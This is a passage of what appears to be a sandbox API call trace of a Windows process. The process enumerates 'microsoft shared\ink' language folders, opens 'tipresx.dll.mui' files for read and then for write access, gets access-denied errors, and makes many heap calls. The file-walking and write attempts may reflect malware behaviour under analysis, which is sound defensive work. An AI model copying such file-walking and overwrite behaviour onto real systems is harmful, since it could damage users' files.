InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.461] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0085.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0085.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0085.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0085.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0085.489] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d57c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0085.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0085.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0085.490] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78950 [0085.490] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076c75d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.490] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0085.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0085.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0085.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0085.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x51590 [0085.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0085.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51590 | out: hHeap=0x20000) returned 1 [0085.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.491] AreFileApisANSI () returned 1 [0085.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6dc60 [0085.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0085.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0085.492] AreFileApisANSI () returned 1 [0085.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85260 [0085.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui") returned 73 [0085.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0085.493] GetFileType (hFile=0x334) returned 0x1 [0085.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0085.493] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.493] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.494] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.494] CloseHandle (hObject=0x334) returned 1 [0085.498] AreFileApisANSI () returned 1 [0085.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x859e0 [0085.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui") returned 73 [0085.499] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.499] GetLastError () returned 0x5 [0085.499] GetLastError () returned 0x5 [0085.499] SetLastError (dwErrCode=0x5) [0085.499] GetLastError () returned 0x5 [0085.499] SetLastError (dwErrCode=0x5) [0085.499] GetLastError () returned 0x5 [0085.499] SetLastError (dwErrCode=0x5) [0085.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0085.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dc60 | out: hHeap=0x20000) returned 1 [0085.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.499] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0085.499] FindClose (in: hFindFile=0x78950 | out: hFindFile=0x78950) returned 1 [0085.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0085.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0085.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0085.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0085.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0085.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0085.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0085.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0085.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0085.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0085.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0085.500] AreFileApisANSI () returned 1 [0085.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL", lpUsedDefaultChar=0x0) returned 57 [0085.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0085.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.500] AreFileApisANSI () returned 1 [0085.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0085.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL") returned 57 [0085.501] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.501] GetLastError () returned 0x5 [0085.501] GetLastError () returned 0x5 [0085.501] SetLastError (dwErrCode=0x5) [0085.501] GetLastError () returned 0x5 [0085.501] SetLastError (dwErrCode=0x5) [0085.501] GetLastError () returned 0x5 [0085.501] SetLastError (dwErrCode=0x5) [0085.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.501] AreFileApisANSI () returned 1 [0085.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0085.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL") returned 57 [0085.501] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.501] GetLastError () returned 0x5 [0085.501] GetLastError () returned 0x5 [0085.501] SetLastError (dwErrCode=0x5) [0085.501] GetLastError () returned 0x5 [0085.501] SetLastError (dwErrCode=0x5) [0085.501] GetLastError () returned 0x5 [0085.501] SetLastError (dwErrCode=0x5) [0085.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0085.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0085.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0085.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0085.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0085.502] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d988, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0085.502] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78950 [0085.502] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d57c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.502] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e8e6bbf, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e8e6bbf, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e8e6bbf, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0085.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0085.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0085.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0085.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0085.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0085.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x51590 [0085.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0085.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.503] 